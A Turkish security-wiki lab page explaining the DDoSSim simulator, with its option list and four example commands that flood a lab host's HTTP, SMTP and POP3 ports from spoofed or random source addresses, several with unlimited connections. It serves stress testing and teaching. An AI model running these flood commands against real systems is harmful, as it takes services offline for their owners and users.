Uygulama Katmanında Botnet Simülasyonu - DDoSSim

BGA Security Wiki sitesinden
Şuraya atla: kullan, ara

Amaç:

DDoSSim aracı kullanılarak botnet simülasyonunun gerçekleştirilmesi.

Araç:

  • DDoSSim

Lab Senaryosu:

DDoSSim, rastgele IP adresleri ile DDOS saldırısını simüle edebilen ve hedef sisteme full TCP bağlantısı kurabilen bir DDOS aracıdır. DDoSSim aracı gerekli bağlantının kurulmasından sonra ilgili uygulama ile konuşmaya başlar. (Ör: HTTP sunucusu)

DdoSSim aracı, C++ ile yazılmış bir DDoS simülatörüdür ve aşağıdaki özelliklere sahiptir.

  • Geçerli HTTP isteği ile DDoS
  • Geçersiz HTTP istekleri ile DDoS
  • SMTP DDoS
  • Rastgele port üzerinden TCP Flood

Uygulamanın kullanımı oldukça kolaydır ve gerekli parametreleri aşağıdaki gibidir:

Usage: ./ddosim
-d IP    	Hedef ip adresi
-p PORT  	Hedef port
[-k NET] 	C sınıfından bir kaynak ip adresi (ör. 10.8.8.0)
[-i IFNAME]  Ağ arayüzü
[-c COUNT]           	Kurulacak bağlantı sayısı
[-w DELAY]           	SYN paketleri arası gecikme (milliseconds)
[-r TYPE]	TCP 3-yollu el sıkışmada kullanılacak saldırı yöntemleri  HTTP_VALID , HTTP_INVALID veya SMTP_EHLO
[-t NRTHREADS]   Paket gönderirken kullanılacak thread sayısı(default 1)
[-n]     	Kaynak ip adresini değiştirme
[-v]     	     	Verbose mod

Uygulamanın kullanımına ait bir takım örnekler aşağı verilmiştir.

Örnek 1:

Rastgele IP adreslerinden hedef sunucunun 80 portuna, kurulan 10 bağlantı üzerinden geçersiz HTTP isteklerinin gönderilmesi:

./ddosim   -d 192.168.200.14   -p 80   -c 10   -r HTTP_INVALID  -i eth0

Örnek 2:

10.8.8.0 ağından SMTP sunucunun 25 portuna, eth0 arayüzünden sonsuz sayıda EHLO isteğinin gönderilmesi:

./ddosim   -d 192.168.200.14   -p 25   -k 10.8.8.0   -c 0   -r SMTP_EHLO  -i eth0

Örnek 3:

Hedef sistemin 80 portuna, geçerli HTTP istekleri ile sonsuz bağlantı kurulumu:

./ddosim   -d 192.168.200.14   -p 80   -c 0   -w 0   -t 10   -r HTTP_VALID  -i eth0

Örnek 4:

Lokal adresten POP3 sunucusuna sonsuz TCP bağlantısının oluşturulması:

./ddosim   -d 192.168.200.14   -p 110   -c 0  -i eth0

Uygulamanın help menüsünden bakılarak örnekler çeşitlendirilebilir.